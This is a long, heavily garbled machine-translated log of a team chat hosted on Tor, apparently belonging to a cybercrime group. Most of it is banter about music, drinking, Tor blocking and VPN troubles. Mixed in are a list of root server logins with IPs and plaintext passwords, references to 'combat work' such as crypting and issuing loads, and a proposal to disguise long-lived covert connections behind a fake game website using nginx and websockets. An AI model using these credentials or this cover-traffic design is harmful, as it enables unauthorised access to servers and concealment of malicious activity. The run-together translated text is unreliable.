I had a question about proxmox, someone would have answered it better... It's a public channel, there's no important information here, just shut him down. I do not know how others, I'm critical communication, otherwise the melancholy in the soulLook for an answer, like a summer nightingaleI do not believe it when they say so, usually do not call backObviously.We will definitely call you backYour answers are important to us.Thanks.Yep.unsubscribes and back into the swamp I start anything and run here I can shit and eat, listening to a book I even rocketed out)) As what, work of course, but instead of watching the first channel and let's get married during the breaks, we prefer to communicate with close in spirit brothers and sisters look - I usually can not do one thing (if it does not need concentration))) And now?And now?) Seriously? I envy youThat I have such an opportunity, alas, no. Friends, I love you all as family, but explain to me, please, what are you so busy that you have time to bullshit? I understand. I'm waiting. I don't mind, Husim, I don't know about the others. Guys, can I ask you a general question for everyone? guys who use proxmox for tests, does it work for you? and hushima? the magic word hushima, i call it - a healthy indifference in the middle can be added -fucking- surprise
- denial
- acceptance.
- acceptance there are 5 stages or it's the first and then the last one) it's already in the way the accusation is omitted, for example - fuck bitch, after - so fuck, where is the last one? and fuck my biography is the same for everybody?
stages of acceptance:
- fuck yeah.
- so fuck.
- all right, fuck.@ned write great news) pull is workingIf the git does not work, piss on adam, ask him to issue a project that you need git Hooray!) shit, not even a single pahabian anecdote can not remember when there is no one to communicate no more than that What do you do?) why relax you tossers the most boring friday!the task is given, they will do it. who got the axe in the end? and the new server with each drink more and more begins to like)))))` said Dima pouring himself a 7th drink `there! fuck yourselves! the pressure is shaking, and then all slow down everyone has a headache? ))) yes it seems normal rchat today not always, but it happens) friday trot = dumb) like the old grandfather's zaporka like all love rocketrocket wants to kill my nerves I have a rocket dumb, but not troitqtokh collected or try?i don't know if it's the rocket's trotting or just my luck? i deleted the messagene that chat, i messed up what's this? why, i just logged inrubenhwif64 put it on) i have nothing but smartctl@jaime with a vicoy to test... it's like eating a hdd without vodka)@all those who haven't gotten their salary, write to me in personThere's old mandriva! i'm sorry, not victoria but hard disk sintinel there is a program victoria it shows health and performancedassd kingston work 70k hours 24/7, filling 90%, may be sluggish due to wear? yes, normgit works?Angelo, you so flap your wings - you'll break your luck)))) "Winter is coming "Soon, the first day of winter for everyone) Yeah, tor-the new browser really crashes вкладкиeyJhbGciOiJBMT1PgYTWR7X9FjqScLLUaqzzMdxhFV2HK6fs5egZ50N1KxP9dGAJwBkRAi3fuDYM7RCe/9TgN7SnNHGskL9wCHGFnuPEs7uwZNw947bvBCWeydfPsUH1H7mg8yr5Dekg5kdgTiwFd1CAWTl5+qocc1j0bnHcbc3H5ZhDuTtAi0vloduTu0ji8HFi/ZecLpK5Zm9BCfzJJ3NvXSdjlwZdYw==eyJhbGciOiJBzGt2Jx88WPZ7UxA3XzbLRygmIJC2s5UcCPSN2gSUAqk/P8xTIeCs6mg+D6UocKQJZGkPlUegbx6+ZsJB+t0fZlenPXKP7xlnY3AiLs7ZGpIwEThJR27uV8uvWMoDVtN0ZT6SKTYMjTNzNeoYueJGHNphCA/5DtgEDQt0JpPyrNQ=eyJhbGciOiJBN749n7uTwSVPQPcrXqsS3s+Od/C6UW6i0S0T0iCm9Efk0geq5LpY0ETq3GtEPbV+k1DU7LQ5pXYXQlvxC7h39KBjAsk7h7xNYKixkd4I86m7y+s49Rw+aZCMuAQDV5/2+stUbQ1TWTjUNP/5GnWyZMWyWCySSk/te/WH55bk9tFWMuL/TnGjuN0rv79FfdbeVYD62rMvGZzTjY+/pgx9mg==eyJhbGciOiJBd81arMadgJrc83RTnYPVg1aXdOLM1zaSJiZHMXHlvOKqZPHBAE3HUOOjO7+PFTvrv/CrbspRPzylJ6LD5XjarKdBrwA5XKuzh5EwucUhagY0ddfLetw075djX9uXc2U+zkLOHBn2pvleLyNor0ULH5QNetbanjWlG4aCU7Nf8xAzi06Zh+xE24M9k5v32I6TeyJhbGciOiJBFXh4cYFOOKxUsWXChmlR0qvddTOu3c4mzs2OUwV1DGRlA2KGLxEY5Rtg3qfXcIwbZlXEkt885nwBcZ3Ef3J1dWMKxTb+kW7fjhbGR3lp/059Mpr0yQnmIHkVFZiK+DHV6G/2xtsLVB1rWqSMKpC4/AkbgI Zhenya - No Rules (final)`)) on @rags you too danke.  In the subject)):smiling_face_with_3_hearts:oh yes what:kissing_heart:clearly)mutual)evening)thank you guys for a good)similarly, the old track just go to sleep)so okay, all the good morningahem, I do not follow him)something similar to the noise by the way, "here and everything. so what" track time - no it sukby would be good) let's write) about hair from the ears you can write a text ... interesting gettings)so the old age, here it comes, and it seemed yesterday still was somewhere beyond Everest ahahahaha)))) and if the hair grows from the ears this is daaaa:grin:ping fuckin(ping))) the beard is nice to a man, but if there is no beard it's no problemIlya Slovesnik like a man's beard)a beard on birthdays in kindergarten sang edith piaf under the sky in Paris dont know it cheep cheep chalyari pro ducklingsUnder the sky in Paris my caronka on the accordion was when toddlers sang in french at school "For Merry Ducklings" and Edith Piaf also. I learned french and adriano chelentano where would the powerhouse be if you weren't there)et si tu n'existais razDessan theme also french for the judgment of society?joe dasseypian the author will throw you here in a chat:grin:it's just a fantasyJim made Beam like :rofl: but the idea is eternal so there is only here, and the rest, what could be -:thumbsup:all this in 21 we will leave those who in our past awareness of that year existed, so let there and fuck up who you in the past))i.e. i.e. the conscious choice of ass - as a certain hopelessness itselfNo, it should be a conscious choice as less often as possible. kick it or fuck it up like a snowdrop sometimes there is no way out but life is a thing yea, you're right it's ok for yourself, the main thing is to have time planned for yourself, i think so, otherwise you'll fuck up :roflI'm already running out of viskarek. Self-education is just for me. it's not a pain. the problem for me is to form an answer to my question. to understand it by ear. it's not a problem to speak English. i haven't lost anything. or is it better to leave everything as it is :grin:1 pedagogical 2 philological:)she has two degrees in english my wife studies guess who))) guess what it is:rofl:bitcha actually there was candy and dreamsbeen searching for the words can be a dreamheard something interesting decided to practice on the music ok I sleep all happy january, love all) fucking study inglishvot so ... how many fans of the beautiful genius among us it turns out)audiomaniac:japanese_ogre:))) I agree with the fact that he just fucked up in this businessa I do not agree that he is powerful(but not really)and it's like he has a copyright theme :thumbsup:yes too powerful man `https://www.youtube.com/watch?v=uWbBSGAYns8 `sekili wo:joy::grin:this spoiler immediately looks at you, as on shit)) or so "we fucked all of you in the mouth it was izi "maybe it was written not to sound egoistic =)so who is a pro it is still a concept to themselves here we have generally other keys in the profession)) but fuck these professionals here all not a proyou can play with even higher qualityWe are not professionals in the description)) no, suddenly the fuck the author is still alive and ask john stump. their hands are growing with geomtric progression)))) \How can you create this is the question of a million))) 4 is not enough just did not get there)) `https://www.youtube.com/watch?v=_5FFYMe-MGE `in four hands?) I threw a link as a Death of a Pianist - 2 hz how can you play this also normal there is such a movie Pianistebane just like his game.t live `https://www.youtube.com/watch?v=_5FFYMe-MGE` there's also a sheet there about how art is real, genuine changes anyone and makes you feel, no matter how hard you try to resist. and the bully was fucking with the eternal scales because of the stench)) john stump waltz of the dead
John stump waltz of the dead... John stump waltz of the dead... John stump waltz of the dead... https://www.youtube.com/watch?v=ynEscyMdIjg... Noonono or notMaksimov seems to be something like this myself... I found one verse by heart from school, Eagle I remember who the author also came in about the fiddler and the neighbor hooligan on TV a few days ago saw a performance. bluebird competition, there Inna Churikova reads a verse about the fiddler hooligan. Can not find it, but just a fire poem, the author does not remember, I just the first time I heard a workpara minute) hope to find it) fucking rebus myself did it really is a masterpiece as a man just for fun composeda I saw and heard myself wanted to, i started studying the sheet music) i'll show you something)) grieg is strong, the melody will see our great-great-(great)x*x times)) talent is a very elastic notion but he didn't invent anything of his own, they also call him a talent you just watch how she plays!//www.Youtube.com/watch?v=gSY-wD4l5DM` seems to be a normal recording from a phone, bro, you can't really hear anything in the mountain king's cave))Antonio Vivaldi's cycle "The Seasons" WINTER part 1:innocent:You should start the year with something good, something eternal. And what could be more eternal than music + https://www.youtube.com/watch?v=nYAXNq8rX0I? Let's say it all costs a fuckload of guitars to play live, and so on.there it is, you'll pick up analog to your taste (analog means live preamps, guitar cabinets) and then there's more, if you get into everything more or less, and you like itManuals on YouTube to help you with all thiszatem download from a torrent guitar rig 6 for your eyespf ukfpfsteinberg ur12shcha say around whatvneshnyaya buy sound card instrumentalpurchase guitar on a budgetIn terms starting now @Garfieldoktax if you find one throwtim straight from the soul)) what solos and .e.) from the first take) there's a video on YouTube where he plays at the stadium at the hockey game zapisalu livenu that is. i can't say anything about him in terms of live music, i told you about him. i've seen him before, he has an aux output or something like that in a budget`https://www.youtube.com/watch?v=SINjsb3plWI `but so and dick scored))) I once looked all sorts of attachments, so that the "whole house" does not have to brand, with zvkosnimy something like @Garfield now sekMichel Seobin on the letter ` connect it in `...` deleted the linkthis guy found it, and what for the beginner on the guitar advise in general ? I don't have any problems with my hearing, even in terms of "home" vocals. studied at the music school, but not strinahi like that look at what he plays as a cannon playstocenimtam normal guy) in ls throw) aha) find the skinumandy*oyi he took the soul of some young sanda there))) there and kveik he fucked up, and worm jmik, and contra with dendia remember in let's get married he was invited to shan tsungav let's get married)) but should know who is close to this subject also on electric guitars etc.д.The main thing is that he is a good electric guitar player, and he played at a hockey match I don't know his name, but he plays like a true soul, the guy's playing the guitar and he's good at playing guitar) he's just a good guitarist) well, the judgments are abstract)) nah, hammett is one of the virtuosos of our time ok) i don't know who he is) and his place was taken by Kirk hammettmastain was kicked out of metallica or something)) i dont know, i listened a long time ago, I listened a long time ago, but I liked it, I just remember it with a secret place, maybe by secret place you mean trust?megadeth band, yes there lyrics like)):)so i fell out, what is the power and the man respected? \they were not fuckin' guitarists at the time the lyrics are so-so it's not a secret play called the fuckin' theme balladmegadeth they have a song i kinda liked itcrete place uncle mastain i love and respect megadethmochoch bro power if you're playing) duke nukem theme i remember 10 years ago picked up this how to learn it and it's in the bag i can do anything, I can do it all, but the main thing is not to be lazy. I always wanted to learn the strings, and I just look at it sometimes and blow off the dust (and another one coming up just 2ogo I have a masterful guitar for 2k baa can you play a Chenit from Kveyk?i've been playing guitar for 15 years and i'm self-taught, i thought about starting with something simple i wanted to study too, but in the cave of the mountain king to learn how to play the piano))) 6 years music school, keyboard self-taught, i can't read from the sheet to read on the computer keyboard now i just work on my material, you know what's up?i'm also in the past) i've just recently put together a hobby, i'm just a musician myself))) \Fucking hell, they're everywhere already \https://www.youtube.com/watch?v=sQiD90jfKYE` rofl:rofl: i'll go listen to koko keyboard with danya milokhin on youtube and i have a phone)) who is it bro?) i hope they drink there? yeah i see mik and jim from the slips fucking riffing in some interview=) let's listen to what kind of music?I can not understand what is the point of this action, these people were identified by some psychologists, boring people from work, go with a beer can bought and drank near the pub, I have a friend who likes this 2-3 cans a week, I do not understand these people)) just turned around and over) and here on the third monitor chat opened just wanted to listen to a couple of tracks without distractions) no, alkgolism is when you booze for two or more days you have an interesting conversation here)fuck you flash)) you live out of time 10 minutes for a couple of seconds this is a verdict based on my childhood friendeboek is already dakajday on 2l beer I think not there how to classify, alkgolism is a couple or three cans of beer a week, is it so? Or am I confused something2 days booze it's overdone so you can really drink in short there is no one who does not drink so this year, will stay home most of the family work, someone has a family I do not mean that they are some kind of alkali) just drink with or without reason will return soon here either you with them, I'll be away from you for 10 minutes, you can't have a hangover. For example, today I drank for the second day, and before that, it's never happened, i have a social circle that includes a shitload of bluebeards, sometimes alcoholics need it) everyone drinks as they say in general i started working, got a family, i split from my friends who were bluebeards long time ago you can't even imagine)) the fuck you got in a society of alcohol-maniacs) i did not want to die a virgin it was a barbarity i used not to drink it seems to me that it is impossible to move, because everyone else drinks in general:But methinks how, seldoma how to relax without alcoholic beverages tomorrow, read today I'm going to update, if I can.....i have to change drinking for sleeping instead of drinking, you just have to have a rest. this year you have to change everything, you have to give up drinking and rest. it's true, all irritants have to be ruled out at once, while you are sober))) methods according to your tastes:I don't think I'd better relax, you may light a light bulb and ace the word stop in your head)) I don't like strong alcohol and snacks, but be careful if you don't have an ace up your sleeve, you can't drink =) but you should touch something painful or you'll get into a fit of rage, that's it, the price is fucked up, not like the price of oil and gasoline - so it's not right)) roughly speaking, they take alcohol =) so it's true that they distill it from oil so I'm a calm and kind-hearted man) vodka has become harsh because it needs to be so. it is originally alcohol diluted with water. I don't know who and what started to dilute it with water, it's a tenth thing and I haven't even started drinking it yet) Jack Daniels costs dox and I'm too sorry to buy it. It's not the degree of alcohol that makes your brain go out like a tumblerWater is a harsh swill40 is dangerous for me Mostly 25-20 I drink max 30)) Fucking infusion40 degrees is infusion =) I don't drink vodka, it costs max 250 rubles at the buy more:grinningthe most fuckin' tincture is a Ukrainian production Pervak without a snack the whole liter tried it I said let's try it then I remembered about the tincture I said let's go to my place for a couple of hours and then go home I remember I invited a friend I hid the alcohol sometimes better than any other valuable property =) but the tincture on the macadamia nuts - a fuckin' topic I don't know I'm no expert here they say natural production the alcohol was natural the former owners worked for the pharma production That's why they hid the alcohol in Ethiopia. There's nothing to ferment it and it's the first time I've heard of it. I don't understand the ageing of alcohol. I'll write down the recipe: A guy in his old private house dug up a 3-liter can of alcohol, it was in the basement, and he bought an old house, the 70s. I've never tasted anything like this before, it's like a vitamin) They'll come back to hang over, will they bite too? And if you get them drunk on tincture?I've been drinking it all year round. I'm going back to the question of where to go, to Ethiopia but the natural product costs as much as an airplane, the more it costs the better it tastes, you fill it with sugar and macadamias nuts together with the skins, buy some good vodka (absolut for example), or if you have access to normal distillers it will be even better I can only advise you) you know what is the best fucking recipe for a good drink?)my verdict - shit))) like bourbon I remember the first time in my life I tried Jack Daniel's, sweet and sour taste, it's basically the biggest plus that it does not require anything at all, but I have not tried it bourbon?i will look it up on googlea but i did not drink that stuff i did not classic jim, apple)) i will have to steal apple juice from my daughter) i ran out of pepsi) i still have half a bottle left i drink william (spiced) Jim Beam 1l ends with me)) i drank a glass of shampoo, sat for Youtube and went to bed sober for the 1st time in 2 weeks decided to get higha it's all right) this is true in nature "what does not kill you makes you stronger" now i let myself, i'm drinking whiskey i thought i would never live to see the light of day, especially in the last 2 months. i have had the most fucked up year. i feel good now. i wish there was something to copy from. they all do it by the same copy. If someone somewhere once handed down a verdict that was needed and it was immediately accepted as a precedent, then all the other decisions will be identical, without even thinking... That's what I'm saying) our laws do not work) even though there was no topic on Caucasians. I told the same thing in court :grin:Next time you should say so: "churka" - this translates from some dialects of Caucasian languages as a sparrow. I'm proud to be a "software engineer-extremist". Fuck that. I'll rewrite everywhere. I'm in the process of registering myself a foreign phone number.:grinning:no, in the vk left a commentdirty plutonium bomb tried to set in motion or what?)) in the end `terrorism` was reclassified as extremism, because everyone just went bald from your ideas?) yes, me too. and if the penalty 10 kop, they will fucking accept it directly through their portal. ))) which was recently )10 kopecks more and there will be a fine for extremism, property and other bullshit through this portal once a year I pay my land tax, I changed my driving license in summer, created an application on the state tax, I came and waited in line for 4-5 hours.
Dear users! For technical reasons authorization is temporarily unavailable. We apologize for the temporary inconvenience.`https://gosuslugi.pnzreg.ru/` The porky portal is still smoking :grinning:I hope this portal will die) such a service :grinning:Fuck ever such and where ever there will be... it's unfortunate, i saw it as a joke recently: in the revival of serfdom you can find out who your lord is on the portal of public services for all we need a principality where everyone will respect each other, and most importantly where laws will be respected we need a principality, in which each of its residents will be a boyar)) but as always, okay, Yes, this scribe is creeping up by leaps and bounds, there's no doubt about it, but the conditions here are more or less, but everything goes to the final point of no return, my two hairs on my head) as everything is tight hereRussia is the best country in the world, just trust me.But I do not feel it my homeDa no, I'm just about the pejorative name itI love my homeland The motherland, I have nothing against itDa, it is so salty, and there are sharks Do not offend our homeland, it still Russia)preferably in a country that has no relation to russia Where can I get out of rushki?) Well, it's like if it's freezing, it's lights out at school, but everything is on the street immediately from the morning))) by the sea in 50 meters) tough))))) I was a kid how you found in the closet at my grandparents all kinds of coats, boots, in general, "trunk" of warmth from World War II, in199 .. what something, itself in all it was wrapped up and has told that to me it on frost and has gone for a walk one in a court yard, in a snow to roll, from a hill to skate... and frost rare -35-38 somewhere was (the Volga region). Well in the end I was told later that he goes to school that way - it's warm, what the fuck are you doing? I had to say that I was sick))) fuck, and where do you hang out there that?)I had already forgotten about it, look at me):grin:i remember when i was 14 i stole my grandfather's gun and went around the countryside shooting pheasants. i fucked nature in summer it was hot and fucking cold in winter. it was the Amur region. i was in the 146 socks and valenki, wrapped in 100 sweaters and 50 fur coats, that's true, where a man can test his strength, I've experienced max -40 on myself, it doesn't break my bones, as my grandfathers told me, but where it's -50....70 in winter... I think you're right)) in terms of survival, everyone has his own struggle, his own war, I guess it's just the same (it's interesting) where it's +30 all year round, the common cold is the most harmless thing that can happen to a man in the street. There any "branch, bush, log, and all that lurks there" is ready to fucking kill you by default) I would check it with pleasure):grinning:Do they know what a cold is?i think it would be cool to change the environment, just for the experience, e.g. radically go to australia i'd love to go somewhere without snownee, i've forgotten something, haven't you been on the ocean for years and you miss the snow?)) there was someone complaining or bragging unobtrusively :grin:ooh, happy new year to you too)happy new year)))) that's the meetingonjour fucking days)happy new year, happy new code)If by chance someone is friends with the admins of Codeby.net - scribble in your personal info :) hello everyone!alive for a while probably a lot of people are still alive and are struggling with the table)are there any survivors? @all checking communications should be otherwise? All alive after the meeting? yay! For the German crbym gkbp ccskre yf regt #6From the German regt translates as "stimulate". Google translated) Stimulates something under the number 6 in the chamber number 6 we can always make it) again you're in your Sanskrit why "compartment number 6" @not regt #6@ )@mitzi crbym gkbp ccskre yf coupe #6 )))), this is what cartridges to put, I need to look maybe there really is suchN2O which emits?:grin:better then not a vacuum cleaner and ozonizer + air filter, and useful and kayfuko coffee in the morning I drink and feel like in the movie "avatar" - only instead of seeds/flowers of the sacred tree, cat pollen flies)old lady really already, the batteries are flooded, all day lies on them, I am bald) you know how much hair from it?
░▐▄░░░▄▌░░░▄▄▄▄░☽░▄▄▄░
░"""▄"""░▄""""""▄░▀░▀
▐▌╬▐"▌╬▐"""""""""▀"░░
▐"""▄"""▌"▀"░░"▀"░"▄"▀
░▀"▄▄▄"▀░"░"░░"░"░░░░░
┌─┬─┬──┬─▀┬▀─┬▀┬▀─┬──┐:woman_red_haired:which ones? What the hell do you need it for, there are more versatile machines for that (.)yesterday bought a robot vacuum cleaner - has not even unpacked, and stands in the corner - robot-pile$0$.ggv Monday knock me, I'll throw you the standard instructions, for beginners just right,
the main thing is to find a whistle or laptop, but the signal there is weak, you need more help, no timeweldon hello, figured out the scrap wifi? pour wifi):vulcan:dobroenet, but now these forums pondroye[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=YbeqLG2pMYPD434uu) https://threatpost.com/revil-ransomware-core-member/175863/[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=CecuXYjA5QzBtyTPp) i am not freeloader, i am a partner (s)
i was a subcontractor for Bogachov for a while and the group_ib is being searched there, there is a whole article about some nikolai with a house and a swimming pool from russia) lockers have always been questionable for the hacking scene) judging by the news reportsRevils in the hacking scene turned into house-2deanontut there was information that the Germans were on the trail of one of Revils....He's been here since morning and not until late evening, as far as I rememberWrite him tomorrow, ask him)If he's working, probably...Well, he's normal? He was todayTo talk to him todayI know that dane was sick, someone talked to him? I just made this conclusion because all my symptoms were similar, the smells were gone, my eye was twitching for 3 months, maybe it was a consequence, I was tested for antibodies and they are present, it turns out that the whole family got it in the spring of 19, a couple of days with fever and 3 weeks without taste or smell and then many people got covid, I do not know the norms, recently the whole family got covid, better tests than speculation... i have all been sick with what, who has bronchitis, who has orvioksti okojatny not need us such tests))) somebody saw/communicated recently??? test positive for kovid) + works test on hubra wrote)))[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=rnYQq4SzXiJkDQe7A) i read that developeri stylish outfit he cat was a fuckinx, only the legend of the cruiser remains.. orrg? was he a developer? well, forks not forks, who's to say, all the glory to him forks is great, i think zeus didn't do enough damage after breaking into revolutions? now there's already fans in fbr) Happy birthday, yevgeny mihaylovich!
https://www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogachevя there) ok@demetrius look in the toad!
root 45.41.204.142 gZI79aU8C5R# NL
root 144.217.50.254 123qweASDzxc UK
root 5.39.63.98 123qweASDzxc FR
root 5.181.80.155 123qweASDzxc USA
root 103.208.86.22 1oa0N;z3JW6:rM New Zealand
root 94.140.114.254 H4CHf5jVM2gDqSp LV
root 139.28.235.26 123qweASDzxc USA
root 104.200.67.231 J9w2uh4f9Y USA
root 45.41.204.140 8W*2LnN7%iDJ NL10 wpcp://tor.rf comes in - gritting his teeth :rofl:Me too))@elroy I believed he could !or put linux in a virtual machine, and use it as a proxy also an option through docker under the windup to run a torproxy if that so Roskompozor has not fully thought it all out who have a wenda - let them go to the site through the linux livtd, download, install, and again all is available can install the package, run Tor, and the site will immediately accessible site no matter from distributions linux package Tor have not yet been removed? -- They probably didn't realize they needed to block the site and started blocking the network. Gone is the great phrase of @angelo.
*"let Franz call the RCN"
```
"Roskomsvoboda: ISPs and operators have stopped blocking the Tor network in Russia, only the torproject site is not accessible
https://www.playground.ru/misc/news/roskomsvoboda_provajdery_i_operatory_prekratili_blokirovat_set_tor_v_rossii_dostupa_net_tolko_k_sajtu_torproject-1161956
```
Apparently, Bro got through :sweat_smile:It all depends on your provider...not the new ones, but from the top 10*you can read the Habr, both Tor and the new vpn-sellers are blocked...hold tech support, angelo's coming :D `no internet, click and there's a dick on it, no internet` The director can just spit in the fuck, cuss in his face and say: he's an animal `something comes to mindhttp://www.youtube.com/watch?v=41deLpbTcawBut I'm getting ready, when it comes to my provider.Even Tor and oppenvpn not block yet.There are brief loses of the Internet a few times a month, and otherwise normal.And I have so far all right (hu * 3).I also have a problem with inetomotwork for the future A maybe, the providers are testing blocking.I think it's testing somethingkstat providers are all stupid nowAnd we usually take a third party, then this https://vpn.sn (aka aprovpn) or http://whoer.петНу complain to support.So good, double, but the last two days began.I think it may be that the VPN service is overloaded, or it may be DDoS-checked, maybe even connection is lost for a short time anywhere between you and the VPN server, maybe your router or internet provider is unnoticeably screwed up. I had glitches with the wire provider when some freeloader put my IP and MAC-address, and at my expense was using the Internet. And I could not log into the network then.ay ayoh, tomorrow will be Silver scolded, nafluchili here)) no, publicqbuy ah, that is, it's not our vpn, like Mars? -- Then if everything is exactly normal with the internet, it's necessary to complain to their support. Or vpn change to another.but i have a network cable from the router, and the client application "company" although the openvpn probably also made.but if one access point hangs, then after re-raising wifi must restart vpn> wifi for 5 minutes disappears
is because the computer is, sometimes switches from one access point to another, which is closer (for example, I came from the bedroom to the kitchen, and there are two points are about the same) I have wifi, sometimes for 5 seconds disappears, and the Internet for 5-10 seconds disappears. Vpn reconnects and everything is fine. But if the wifi specifically sucks, then only restarting openvpn helps.
Although the underlying internet is working without any visible glitches. Although by timeout it should of course restart, but if the underlying internet does not work, then there will be no connection. If, for example, wifi is down, it will be. It seems that before you have just had problems with the internet/local network, and now they have started. someone observed something like this? the second day something with vpn, constantly began to stop working until the all new reconnect. an updated tor-browser fonts in the rocket remained the same as they were (linux) browser yesterday offered to update the fact perhaps tor-browser updated? I have everything as was so I alone?something happened to the rocket all of a sudden, the fonts have changed and it became very uncomfortable to read it so don't flood it yet my goal is to give you a rest, while still ensuring the maintenance of vitality.Okokeya will be in touch regularly those who are not engaged in combat work (long-term projects) - formally, it's still a working day, but *free schedule * ;)those who are engaged in combat work (crypts, issuing loads, etc.) - teamleads organize standby, so that always one person was in touch in all chats.
The schedule of issuing loads is determined by your customers - that is, in the end *your schedule depends on them (will / will not work) *jokingly )those who are busy in combat work, no holidays. Not a gram in the mouth, and so on.For those who have been with us for less than a year, I tell youafter the question "how we work in the new year" @alvnimost, respect, attentinobududit.so bridges should definitely useThanks, I will try.Use bridgeshttp://www.securitylab.ru/news/527359.рһрСегодня tor bowser updated without asking, connected managed after an hour of trying.I took adat external ssd, and satisfied with[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=MxrM8EEe9XNmcXzLm) the thing is theory, but in real life can be - dunno, NVMe all depends on the PCIe version, I now regret that the motherboard does not vryal with PCIex4, 2 times faster PCIex3 with flash drives poor memory, Samsung yes (the fastest, 10 years warranty), but which sandisk will not take) lolv you I had no doubt, our pole !What's wrong with winter depressions?what's the silence on the air? @pongping? @elliott unsubscribe[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=iB5CATGXwL9PRS5i4)+speak to me in person what do you need from him now? git not yet @alalnu fuh git? do not worry jaba soon will rise[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=QjxfAoHGoKC4Li5YX) take nginx and way it proxies to some muzzle online games. The same tanks or ruler. or whatever is popular there now.

Then get a domain similar to that of the game. Then you can use it inside as you please.  And for fake connections, let nginx proxy some uri to nodejs script - a websocket server. And then you connect from other places via wss and send random data there at random times. The main thing to remember that the client always shelves 10-100 times less than what he receives. kventin kinda have a web-designer? Remind the nickname pliz in the course of the same as with the toad (what's up with the git? I may be somewhat abstruse wrote, I just need a site, a fake, just what would it look like from the outside it seems plausible ...On the nodejs socket-io. crap out a server. and the same library connects with the client. If you go to the site, it was clear why it is connected to the "long" ... The question to the experts, we need a simulation of the website, preferably a game server with a web-mind, what would the connection in one port, the conditional 24/7 look logical. Maybe there are some ideas? Sps! If jabo come to life, plzu all tora([ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=XXved459xrxpidWN3) apparently the servers have senile impotence ))oxypressure in the morning nothing stands and falls da, at all jabo not working. Git also does not work (Whoops, GitLab is taking too much time to respond.)and git also -- does the toad work?) tor kolbasa@ruby there's such a morning directly in the toad does not let):grin:)))) ay krosavecheg my machineThank you all for the versions. tips and hints there are named cars now, the identity is immediately visible) or Eugene, but he offnu there is a type who on the release of a stiletto torrent downloaded through a combat vpn can itmanuel knocked ...
turn off all the VMs and watch the result)) and they do not have to watch, just from their admin to check the VMs and processes, but it's a test run, there is no definition they have another problem do not think that they are watching and know the ID of the VM :) in proxmoxoni there chef somebody put on the test, and do not recognize it, there they are powerless) @gator @mitziuw proxmox? I knew that someone would see it and appreciate it !-Thank you brogeneNow it's already a rhyme )-Yeah )-Hokka ?-Hokka ?
¶ now he can't stand his dick ¶

Who likes it stronger, and someone sportsman I brew a stronger puerchik ...) Brothers who have not received zap - write in person! No. The phone was out. I had no connection at all yesterday. (( It seems that something happened to the tower. I did not even think at once, well done cat @generalinfoa I'm drinking here I think there was no need to drink beer and me) ahead of you, but thanks all the same! i just switched to the latest fox, it's the same, but the fonts are default I don't think so, it's in the official repositoriesMaybe it's a dud i got 10.5.10 on my phone too, but it upgraded itself before i switched from that fuckerI got 10.5.10 on my phone, but 11 on linux, there it is) i also got 10.5.10 from the off-site gives 10.5.10
```
https://www.torproject.org/download/
Maybe you have a special version of the hacker? I have 11Interesting) Run an update check, says no update `Tor Browser 11.0 (20210602010101) Details
Installed on: November 10, 2021, 9:07:28 AMStatus: The Update was successfully installed `10.5.10 64 bit -OK.A new is what? I have a 10.5.10 last, it works well with me like nothing. I have the previous gdi resources leak mercilessly. about this I will not sayTo that you recommend not to update? tabs fall, canvas stupid third of the screen ate, some tabs are deleted from memory and when you open the page reloadsWhat is it?the new tor browser is a cunt@frances Hi, look there in the personal page of the other) that's capitalism, as long as something grows, sit back and enjoy it I read about btz information from Weldon, came - I looked ... just a good Friday night to learn) bitcoke is growing, what's your hemorrhoids?I can't wait for you today, I can't wait for you. 100 should be 60) efrainAgain, I wish I could. With this trend I can expect 100 by the end of the year.A bitok that at 60 + is already back to the position at the beginning of the year)software is spinning - beer is flourishing)) okay, while the sbrka is spinning - for a beer sgonyuyu certainly played@angelo you played?)In the GEH could play tetris and DumYou said I immediately remembered! Yes GEH was super! This is like drinking, only in reverse)@jaime remember the GEH? :)it's a chat room for impotent virgins bitten by wild poisonous penguins :penguin:and where is the chat room for drinkers druochunov? are those who only eat what do not drink? hey guys it's a chat room for non-drinkers wankers emptyahaa sure this is the 